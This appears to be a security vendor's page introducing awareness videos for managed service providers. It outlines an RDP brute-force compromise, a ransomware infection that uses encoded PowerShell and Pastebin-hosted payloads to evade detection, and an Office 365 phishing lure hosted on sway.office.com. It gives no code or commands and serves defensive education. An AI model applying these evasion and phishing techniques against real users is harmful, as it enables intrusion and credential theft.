Anchor Links to Featured Videos:
About Videos 1 & 2:
Huntress originally shared the first two videos in a joint webinar featuring Huntress, Datto, Connectwise, and ID Agent: Channel Security Experts Deep Dive: The Anatomy of an MSP Breach. We recommend downloading these videos and scripts and using them to help prospects better understand hacker techniques. Note that there is no audio in these videos, as they are intended for you to use them in your own presentations and conversations with prospects.
You can view these videos with live narration from Kyle Hanslovan, Huntress Co-Founder & CEO, at the following timestamps in the webinar recording:
- RDP Compromise (12:40 - 18:40)
- Ransomware Infection (27:10 - 30:00)
As engineers, we all know multi-factor authentication and VPN access into networks are best practices. However, convincing stakeholders to invest in these technologies is easier said than done. This video was designed to show how attackers discover RDP exposed to the internet, brute force into networks, bypass security hurdles, capture user passwords, and spread into other user systems.
To a non-technical audience, ransomware incidents are confusing and raise questions as to why they can't be easily prevented. This video shows how hackers abuse multiple legitimate Windows applications (cmd.exe, start, powershell.exe) and encode commands to bypass behavior-based antivirus. It also illustrates how the attacker leveraged trusted websites like Pastebin to evade domain reputation analysis to deliver ransomware payloads.
Office 365 Phishing
Hackers are abusing the legitimate sway.office.com product to phish users out of their Office 365 credentials:
- Users receive an email/link telling them they have a voicemail in Microsoft Teams
- Users follow the link because the page is hosted on a legitimate Microsoft webpage (as demonstrated by the valid certificate)
- Users click the listen button and it takes them to a fake Office 365 login page to collect their email and password